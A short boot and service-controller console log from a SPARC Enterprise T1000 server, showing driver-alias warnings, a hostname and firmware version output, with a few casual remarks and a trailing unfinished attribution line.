 Copyright (c) 1983, 2016, Oracle and/or its affiliates. All rights reserved.  
 os-io WARNING: failed to resolve 'scsa,probe' driver alias, defaulting to 'nulldriver'  
 WARNING: failed to resolve 'scsa,nodev' driver alias, defaulting to 'nulldriver'  
 Hostname: hostnix01  
 Configuring devices.  
 LDAP NIS domain name is  
 No panics. Yay!   
 sc> showhost  
 SPARC-Enterprise-T1000 System Firmware 6.7.13 2013/09/24 08:10  
 Host flash versions:  
   OBP 4.30.4.e 2013/09/23 16:06  
   Hypervisor 1.7.3.d 2013/09/24 07:19  
   POST 4.30.4.b 2010/07/09 14:25  
 All is as it should be.    

 some of this was lifted from here: